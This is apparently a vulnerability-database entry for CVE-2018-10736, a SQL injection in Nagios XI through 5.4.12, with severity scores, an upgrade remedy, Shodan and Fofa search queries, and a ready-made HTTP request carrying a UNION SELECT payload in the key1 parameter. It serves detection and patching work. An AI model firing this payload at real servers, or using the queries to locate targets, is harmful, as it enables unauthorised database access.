🔙 목록으로 돌아가기

CVE-2018-10736: NagiosXI <= 5.4.12 - SQL injection

TitleNagiosXI <= 5.4.12 - SQL injection
AuthorDhiyaneshDK
SeverityHigh
ImpactAuthenticated administrators can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Nagios XI instance.
RemediationUpgrade to Nagios XI version 5.4.13 or later.
CVSS Score7.2
EPSS Score0.83161
CVE IDCVE-2018-10736
CWE IDCWE-89
Shodan Queryhttp.title:"nagios xi"
Fofa Queryapp="Nagios-XI"title="nagios xi"app="nagios-xi"
Tags cve cve2018 nagios sqli vuln

🔍 Vulnerability Description

A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.

🌐 HTTP Request

GET /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5(8395))%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-10736.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-10736.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A